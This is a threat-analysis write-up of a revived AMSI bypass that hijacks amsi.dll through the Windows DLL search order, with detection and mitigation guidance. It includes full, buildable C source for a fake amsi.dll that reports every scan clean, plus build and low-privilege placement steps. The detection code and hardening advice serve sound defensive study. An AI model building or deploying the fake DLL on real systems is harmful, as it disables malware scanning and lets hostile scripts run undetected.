Full Report
While working on DoubleAgent as part of the Introduction To Red Teaming course we’re developing for RingZer0, I had a look at Anti-Malware Scan Interface (AMSI) bypasses. One of the objectives I had was to find a new way to evade AMSI. As with my DoubleAgent work, this did not lead to the identification of a novel finding, but instead revealed that old techniques can be revived with minimal work. This blog post describes how to resurrect the original DLL hijack documented by Cn33liz by extending it to simply define the typically exported functions found in amsi.dll in a fake DLL. This gives a low-privileged user an AMSI bypass if they can write to a directory that the loader searches before System32 (for example, the directory holding a copied powershell.exe).
Analysis Summary
# Tool/Technique: Resurrected AMSI DLL Hijack Bypass
## Overview
This technique resurrects an old DLL hijacking method to achieve an Anti-Malware Scan Interface (AMSI) bypass, primarily against PowerShell. The attacker builds a fake `amsi.dll` that exports the same function names as the legitimate DLL, so the host process resolves them successfully at load time. If the attacker can write to a directory that the Windows DLL search order consults before `%SystemRoot%\System32` (for PowerShell, the directory containing a copied `powershell.exe`, which is searched first), the process loads the fake DLL instead of the legitimate one. Its `AmsiScanBuffer`/`AmsiScanString` never reach a registered antimalware provider, so nothing executed in that process is scanned.
## Technical Details
- Type: Technique
- Platform: Windows (targeting PowerShell, which uses AMSI)
- Capabilities: Bypassing AMSI functionality for script execution within the compromised process (e.g., PowerShell).
- First Seen: The original technique was documented circa 2016; this report details its successful resurrection in June 2020 using updated knowledge of required exports.
## MITRE ATT&CK Mapping
- TA0005 - Defense Evasion
- T1574 - Hijack Execution Flow
- T1574.001 - DLL Search Order Hijacking (Specific application: Hijacking the loading of `amsi.dll`)
## Functionality
### Core Capabilities
- **DLL Creation:** Creating a custom DLL (named `amsi.dll`) that implements the minimum required 7 exported functions documented by Microsoft for AMSI interaction.
- **DLL Hijacking:** Placing this fake DLL in a directory searched by the host process (e.g., PowerShell) according to the Windows DLL Search Order, ensuring it loads before the legitimate system DLL.
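A minimal stand-in DLL of the kind the two bullets above describe, written here as an added example and not taken from the original post or from Cn33liz's code. Which seven exports the post counts is not stated, so the six entry points declared in Microsoft's `amsi.h` plus `AmsiNotifyOperation` are assumed; the dummy handle values, the build command and the `fake_amsi_selftest` helper are the example's own choices:

```c
/* Added example (not code from the original post): a stand-in amsi.dll that
 * defines the AMSI exports so a host resolving them by name loads it and then
 * never reaches a real scanner. Assumed export set: the six from amsi.h plus
 * AmsiNotifyOperation. On Windows build it as a DLL, for example
 *   x86_64-w64-mingw32-gcc -shared -o amsi.dll fake_amsi.c
 * Elsewhere the Windows types are stubbed so the logic compiles stand-alone. */
#include <stddef.h>

#ifdef _WIN32
#include <windows.h>
#define AMSI_EXPORT __declspec(dllexport)
#define AMSI_CALL   WINAPI
#else
/* Stand-ins for the Windows types used below (non-Windows build only). */
typedef long HRESULT;
typedef unsigned long ULONG;
typedef void *PVOID;
typedef const wchar_t *LPCWSTR;
#define S_OK ((HRESULT)0)
#define AMSI_EXPORT
#define AMSI_CALL
#endif

/* Same shapes as amsi.h: opaque handles and the result enum. */
typedef struct HAMSICONTEXT__ *HAMSICONTEXT;
typedef struct HAMSISESSION__ *HAMSISESSION;
typedef enum AMSI_RESULT {
    AMSI_RESULT_CLEAN = 0,
    AMSI_RESULT_NOT_DETECTED = 1,
    AMSI_RESULT_DETECTED = 32768
} AMSI_RESULT;

/* Dummy objects handed back as handles; hosts only pass them around. */
static struct HAMSICONTEXT__ { int unused; } g_fake_context;
static struct HAMSISESSION__ { int unused; } g_fake_session;

AMSI_EXPORT HRESULT AMSI_CALL AmsiInitialize(LPCWSTR appName, HAMSICONTEXT *amsiContext)
{
    (void)appName;
    if (amsiContext) *amsiContext = &g_fake_context; /* non-NULL so hosts that check proceed */
    return S_OK;
}

AMSI_EXPORT void AMSI_CALL AmsiUninitialize(HAMSICONTEXT amsiContext) { (void)amsiContext; }

AMSI_EXPORT HRESULT AMSI_CALL AmsiOpenSession(HAMSICONTEXT amsiContext, HAMSISESSION *amsiSession)
{
    (void)amsiContext;
    if (amsiSession) *amsiSession = &g_fake_session;
    return S_OK;
}

AMSI_EXPORT void AMSI_CALL AmsiCloseSession(HAMSICONTEXT amsiContext, HAMSISESSION amsiSession)
{
    (void)amsiContext; (void)amsiSession;
}

/* The bypass itself: no provider is consulted, every buffer is reported clean. */
AMSI_EXPORT HRESULT AMSI_CALL AmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length,
                                            LPCWSTR contentName, HAMSISESSION amsiSession,
                                            AMSI_RESULT *result)
{
    (void)amsiContext; (void)buffer; (void)length; (void)contentName; (void)amsiSession;
    if (result) *result = AMSI_RESULT_CLEAN;
    return S_OK;
}

AMSI_EXPORT HRESULT AMSI_CALL AmsiScanString(HAMSICONTEXT amsiContext, LPCWSTR string,
                                            LPCWSTR contentName, HAMSISESSION amsiSession,
                                            AMSI_RESULT *result)
{
    (void)amsiContext; (void)string; (void)contentName; (void)amsiSession;
    if (result) *result = AMSI_RESULT_CLEAN;
    return S_OK;
}

AMSI_EXPORT HRESULT AMSI_CALL AmsiNotifyOperation(HAMSICONTEXT amsiContext, PVOID buffer,
                                                 ULONG length, LPCWSTR contentName,
                                                 AMSI_RESULT *result)
{
    (void)amsiContext; (void)buffer; (void)length; (void)contentName;
    if (result) *result = AMSI_RESULT_CLEAN;
    return S_OK;
}

/* Walks the call sequence a host makes (init, session, scan, close) with a
 * constructed sample buffer; returns 1 when both scans come back clean. */
int fake_amsi_selftest(void)
{
    HAMSICONTEXT ctx = NULL;
    HAMSISESSION sess = NULL;
    AMSI_RESULT r = AMSI_RESULT_DETECTED;
    char payload[] = "Write-Host 'constructed sample'"; /* content is irrelevant to this DLL */
    if (AmsiInitialize(L"FakeHost", &ctx) != S_OK || ctx == NULL) return 0;
    if (AmsiOpenSession(ctx, &sess) != S_OK || sess == NULL) return 0;
    if (AmsiScanBuffer(ctx, payload, (ULONG)sizeof payload, L"sample.ps1", sess, &r) != S_OK) return 0;
    if (r != AMSI_RESULT_CLEAN) return 0;
    r = AMSI_RESULT_DETECTED;
    if (AmsiScanString(ctx, L"Write-Host 'constructed sample'", L"sample.ps1", sess, &r) != S_OK) return 0;
    if (r != AMSI_RESULT_CLEAN) return 0;
    AmsiCloseSession(ctx, sess);
    AmsiUninitialize(ctx);
    return 1;
}
```

Built on Windows and dropped beside a copied `powershell.exe`, the loader resolves `amsi.dll` from the application directory before `System32`, which is the whole trick. Two caveats worth checking before assuming the hijack will take: on 32-bit builds the stdcall exports come out decorated (`AmsiScanBuffer@24`) unless a `.def` file or linker option keeps the plain names, and any export the host resolves that is missing from the fake DLL makes the load fail outright, which is exactly why the original technique stopped working until the export list was refreshed.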
### Advanced Features
- **Low-Privilege Evasion:** No elevation is needed. A user who controls any directory on the host process's DLL search path gets the bypass; the simplest case is copying `powershell.exe` and the fake `amsi.dll` into the same user-writable folder, so the fake DLL sits in the application directory that is searched first.
- **Reviving Old Methods:** Demonstrates that minimal effort on a well-documented older technique can restore a working bypass when whatever neutralized it depended on application behavior (here, the set of exports the host expects to resolve) that has since changed.
## Indicators of Compromise
- File Hashes: Not explicitly provided in the text for the malicious DLL.
- File Names: `amsi.dll` (the malicious version).
- Registry Keys: None explicitly mentioned as part of the exploit mechanism itself.
- Network Indicators: None; this is a purely local bypass.
- Behavioral Indicators:
- A script that AMSI would normally flag running to completion in PowerShell, with no corresponding AMSI detection event, immediately after the custom DLL is placed.
- `amsi.dll` being loaded from a path other than `%SystemRoot%\System32` (or `SysWOW64` for 32-bit hosts), or an `amsi.dll` image that is not Microsoft-signed; visible in ProcMon Load Image events or Sysmon Event ID 7 (ImageLoaded).
## Associated Threat Actors
- Not associated with specific known threat actor groups; this was developed in the context of a Red Teaming course demonstration.
## Detection Methods
- **Signature-based detection:** Windows Defender was noted to have added detection for the copy of the malicious DLL into user-controllable folders shortly after the technique was tested.
- **Behavioral detection:** Alert on image loads of `amsi.dll` (Sysmon Event ID 7, ProcMon Load Image) whose path is outside the system directory or whose signature is missing or not Microsoft's; more generally, watch for copies of `powershell.exe` executing from user-writable locations and for processes that manipulate the DLL search path.
- **YARA rules:** Not provided in the text, but a rule could target a PE that exports the AMSI function names (`AmsiInitialize`, `AmsiScanBuffer`, and so on) yet carries no Microsoft signature, since the genuine `amsi.dll` is signed.
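One concrete form of the behavioral indicators and the detection methods listed above, as an added example that is not part of the original post: a triage function over image-load records shaped like the ImageLoaded/Signed/Signature fields of Sysmon Event ID 7, run over constructed sample events, plus a Windows-only self-check a test harness can call inside a process to see which `amsi.dll` the loader actually resolved. `%SystemRoot%` is assumed to be `C:\Windows`, and `Microsoft Windows` is assumed as the signer string the genuine DLL carries; the sample paths and vendor name are made up.

```c
/* Added example: flag amsi.dll image loads that do not match the genuine DLL.
 * Records mirror the ImageLoaded / Signed / Signature fields of Sysmon
 * Event ID 7; the sample events below are constructed, not captured. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

typedef struct {
    const char *image_loaded; /* full path of the loaded image */
    int         is_signed;    /* 1 if the image carried a valid signature */
    const char *signature;    /* signer name, "" when unsigned */
} image_load_event;

/* Case-insensitive equality (Windows paths and file names are case-insensitive). */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == *b;
}

/* Pointer to the file-name part of a Windows (or POSIX) path. */
static const char *basename_of(const char *path)
{
    const char *p = path, *base = path;
    for (; *p; p++)
        if (*p == '\\' || *p == '/')
            base = p + 1;
    return base;
}

/* Is the directory part of path one of the places the genuine amsi.dll lives?
 * Assumes %SystemRoot% is C:\Windows. */
static int in_system_dir(const char *path)
{
    const char *base = basename_of(path);
    size_t dirlen = (size_t)(base - path);
    char dir[260];
    if (dirlen == 0 || dirlen >= sizeof dir)
        return 0;
    memcpy(dir, path, dirlen - 1); /* drop the trailing separator */
    dir[dirlen - 1] = '\0';
    return ieq(dir, "C:\\Windows\\System32") || ieq(dir, "C:\\Windows\\SysWOW64");
}

/* 1 if the event is an amsi.dll load from the wrong place or with the wrong
 * (or no) signature; 0 for any other image or for a legitimate load. */
int is_suspicious_amsi_load(const image_load_event *e)
{
    if (!ieq(basename_of(e->image_loaded), "amsi.dll"))
        return 0;
    int ms_signed = e->is_signed && ieq(e->signature, "Microsoft Windows");
    return !in_system_dir(e->image_loaded) || !ms_signed;
}

int count_suspicious(const image_load_event *events, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += is_suspicious_amsi_load(&events[i]);
    return hits;
}

/* Constructed sample: a legitimate 64-bit load, a legitimate 32-bit load, a
 * sidecar copy next to a relocated powershell.exe, a non-Microsoft signer in
 * the right directory, and an unrelated DLL that must not be flagged. */
static const image_load_event sample_events[] = {
    { "C:\\Windows\\System32\\amsi.dll",         1, "Microsoft Windows" },
    { "C:\\Windows\\SysWOW64\\amsi.dll",         1, "Microsoft Windows" },
    { "C:\\Users\\alice\\Desktop\\ps\\amsi.dll", 0, "" },
    { "C:\\Windows\\System32\\AMSI.DLL",         1, "Example Vendor Ltd" },
    { "C:\\Windows\\System32\\kernel32.dll",     1, "Microsoft Windows" },
};

size_t sample_event_count(void) { return sizeof sample_events / sizeof sample_events[0]; }
int sample_is_suspicious(size_t i) { return is_suspicious_amsi_load(&sample_events[i]); }
int sample_suspicious_total(void) { return count_suspicious(sample_events, sample_event_count()); }

#ifdef _WIN32
#include <windows.h>
/* Inside a live process: 1 if the amsi.dll the loader resolved sits in the
 * system directory, 0 if it came from elsewhere, -1 if none is loaded yet.
 * Location only; check the signature separately (e.g. Get-AuthenticodeSignature). */
int loaded_amsi_in_system_dir(void)
{
    char path[MAX_PATH];
    HMODULE h = GetModuleHandleA("amsi.dll");
    if (!h || !GetModuleFileNameA(h, path, sizeof path))
        return -1;
    return in_system_dir(path);
}
#endif
```

The two conditions are deliberately independent: the sidecar copy fails on location even if the attacker signs it with some certificate, and a signed-by-someone-else `amsi.dll` in `System32` still fails on signer. The case-insensitive comparison matters because the loader will happily resolve `AMSI.DLL`, and a rule keyed on the exact lowercase name misses it.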
## Mitigation Strategies
- **Prevention:** Keep endpoint security solutions (such as Windows Defender) updated; newer versions were observed to detect the file placement used by this low-privilege bypass.
- **Hardening recommendations:** Host applications should load `amsi.dll` by its full path under the system directory rather than by bare name, so the search order cannot be hijacked; that fix belongs to the application author, not the defender. On the defender's side, application control (AppLocker executable and DLL rules, or WDAC, allowing only `Program Files` and `Windows` locations) stops a copied `powershell.exe` and its sidecar DLL from running out of user-writable folders, and write access to directories on the search path of legitimate installs should be restricted.
## Related Tools/Techniques
- Original DLL hijack documented by Cn33liz.
- DoubleAgent (mentioned as context for the research).
- Other AMSI Bypass Techniques documented in public repositories (e.g., S3cur3Th1sSh1t/Amsi-Bypass-Powershell).